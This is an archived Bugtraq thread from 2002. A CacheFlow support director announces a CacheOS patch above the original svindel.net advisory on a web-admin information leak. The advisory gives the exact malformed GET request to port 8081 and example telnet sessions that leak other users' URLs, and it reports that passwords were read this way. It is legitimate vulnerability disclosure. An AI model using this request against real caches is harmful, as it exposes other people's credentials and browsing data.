Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

RE: svindel.net security advisory - web admin vulnerability in Ca cheOS

From: "Campbell, Dirk" <dirk.campbell () cacheflow com>
Date: Tue, 5 Feb 2002 09:25:06 -0800 

Hello All:

The purpose of this email is to advise you that CacheFlow Inc. has provided
a software update for the potential issue outlined in your January 8, 2002
email addressed to 'bugtraq () securityfocus com.' An updated version of
software is now available for all supported CacheFlow hardware platforms,
and may be obtained by CacheFlow customers at the following URL:

http://download.cacheflow.com/

The specific reference to the software update is contained within the
Release Notes for CacheOS Versions 4.0.14, Release ID 17085 and 17087, as
follows:

http://download.cacheflow.com/release/SA/4.0.14/relnotes.htm
http://download.cacheflow.com/release/CA/4.0.14/relnotes.htm

.SR 1-1350501: This update modified a condition where sending "GET" to the
console port could result in an illegible message. This update addresses the
potential BugTraq security issue.  

Upon your download and use of this update, CacheFlow Inc. is requesting your
acknowledgement by responding to this email, of the modification provided.
In addition, we would like to request that you forward the above-stated
update information to your original mailing list.  We thank you for your
time.  Please feel free to contact me should you have any questions or if I
can provide you with any additional information.

_____________________________________________
 
 Dirk Campbell                 
 Director, CacheFlow Customer Support  
 CacheFlow Inc.  
 650 Almanor Avenue 
 Sunnyvale, CA  94085
 
 Direct Phone:    408.220.2231
 Fax:             408.220.2250

 http://www.cacheflow.com/

 "Making the Internet Content-Smart" 



-----Original Message-----
From: Bjorn Djupvik [mailto:bugtraq () svindel net]
Sent: Tuesday, January 08, 2002 5:15 PM
To: bugtraq () securityfocus com
Cc: tommy () svindel net
Subject: svindel.net security advisory - web admin vulnerability in
CacheOS


----------------------------------------------------------------------------
-------------------

SECURITY ADVISORY

No:  001 (yay, our first!)
Credits: svindel.net research team
Date published: 01/08/2002
First discovered: 10/31/2001
Title: Cacheflow CacheOS[tm] web admin vulnerability
----------------------------------------------------------------------------
-------------------
Description:
CacheOS is a piece of software used by web caching devices made by Cacheflow
(www.cacheflow.com), basically an Intel based box with a RAID array and a
custom OS.
The CacheFlow has a web-admin interface open at port 8081 by default.
By sending a certain request, malicious hosts can view parts of web pages
and url's transferred through the cache at the time. Examples of
data that may be gathered using this method are, usernames/passwords, form
contents, url's etc..

This exploit was tested on various CacheOS v3.1.*  boxes and all were
vulnerable, we did not test on 4.* versions.

Exploit:

telnet or use nc to connect to port 8081, then issue the following command:

GET /Secure/Local/console/cmhome.htm

Now legally in http you should also supply something like HTTP/1.0 at the
end of that string, if
you do that then the cache replies that my station is not authorized to view
page. If you omit HTTP/1.0 like I did above, most times the cache just
issues this:

----------------------------------------------------------------------------
-------------------
Example exploit session:

localhost:~# telnet cacheflow 8081
Trying xxx.xxx.xxx.xxx...
Connected to cacheflow.
Escape character is '^]'.
GET /Secure/Local/console/cmhome.htm

HTTP/1.0 200 OK

Request cannot be honored
Connection closed by foreign host
----------------------------------------------------------------------------
-------------------


But if you try multiple times it will sometimes return something like this:


----------------------------------------------------------------------------
-------------------


localhost:~# telnet cacheflow 8081
Trying xxx.xxx.xxx.xxx...
Connected to cacheflow.
Escape character is '^]'.
GET /Secure/Local/console/cmhome.htm

HTTP/1.0 404-Not Found

<HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The
request
ed URL "/Secure/Local/console/cmhome.htm

Easp&o=0&sv=za5cb0d78&qid=E2BCA8F417ECE94DBDD27B75F951FFDA&uid=2c234acbec234
acbe
&sid=3c234acbec234acbe&ord=1" was not found on this
server.<P></BODY>Connection
closed by foreign host.
----------------------------------------------------------------------------
-------------------


As you can see, the chunk of code it blurted out in the 404 page contained
part of an url that a client on
the cache was visiting at the time.
We have also been able to read passwords from URL's using this technique.
There are probably more ways to exploit this and greater holes to be found,
but we didn't find any.. feel free to poke around :)

Vendor status:  support () cacheflow com were contacted on 10/31/2001 and we
got a quick reply asking us for more information, however no information of
patches or fixes were supplied to us so we don't know if this is fixed in
the latest versions of CacheOS or not. Since such a long time has passed, we
are now releasing this advisory.

----------------------------------------------------------------------------
-------------------

[c] 2002 svindelegget
Previous By Date Next
Previous By Thread Next

Current thread: